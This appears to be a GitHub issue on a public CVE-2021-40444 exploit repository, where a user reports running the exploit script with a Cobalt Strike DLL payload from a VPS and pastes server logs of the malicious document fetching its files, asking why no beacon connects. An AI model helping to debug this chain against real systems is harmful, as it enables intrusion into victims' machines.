CVE-2021-40444
CVE-2021-40444 copied to clipboard
lockedbyte
Linking the server to my IP
Hi. Exploit does not knock on Cobalt Strike. I did everything according to the instructions, generated my dll in cobalt (it is on the VPS), then ran python3 exploit.py host 80
Logs:
::ffff:xx.xxx.xxx.xxx - - [16/Oct/2021 11:41:50] code 404, message File not found ::ffff:xx.xxx.xxx.xxx - - [16/Oct/2021 11:41:50] "GET /srv/artifact.dll HTTP/1.1" 404 - ::ffff:xx.xxx.xxx.xxx - - [16/Oct/2021 11:42:07] "GET /word.cab HTTP/1.1" 200 - ::ffff:xxx.xxx.xxx.xx - - [16/Oct/2021 11:42:52] code 501, message Unsupported method ('OPTIONS') ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:52] "OPTIONS / HTTP/1.1" 501 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:52] "HEAD /word.html HTTP/1.1" 200 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:53] code 501, message Unsupported method ('OPTIONS') ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:53] "OPTIONS / HTTP/1.1" 501 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:53] "GET /word.html HTTP/1.1" 200 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] "HEAD /word.html HTTP/1.1" 200 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] "HEAD /word.html HTTP/1.1" 200 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] code 501, message Unsupported method ('OPTIONS') ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:54] "OPTIONS / HTTP/1.1" 501 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:55] "HEAD /word.html HTTP/1.1" 200 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:55] code 501, message Unsupported method ('OPTIONS') ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:55] "OPTIONS / HTTP/1.1" 501 - ::ffff::xxx.xxx.xx.xx - - [16/Oct/2021 11:42:56] "GET /word.html HTTP/1.1" 304 - ::ffff:xxx.xxx.xx.xx - - [16/Oct/2021 11:42:56] "HEAD /word.html HTTP/1.1" 200 - ::ffff:xxx.xxx.xx.xx - - [16/Oct/2021 11:42:57] "HEAD /word.html HTTP/1.1" 200 - ::ffff:xxx.xxx.xx.xx - - [16/Oct/2021 11:42:57] "GET /word.cab HTTP/1.1" 200 -
In the terminal on the VPS, requests show, but nothing is shown in Cobalt Strike.
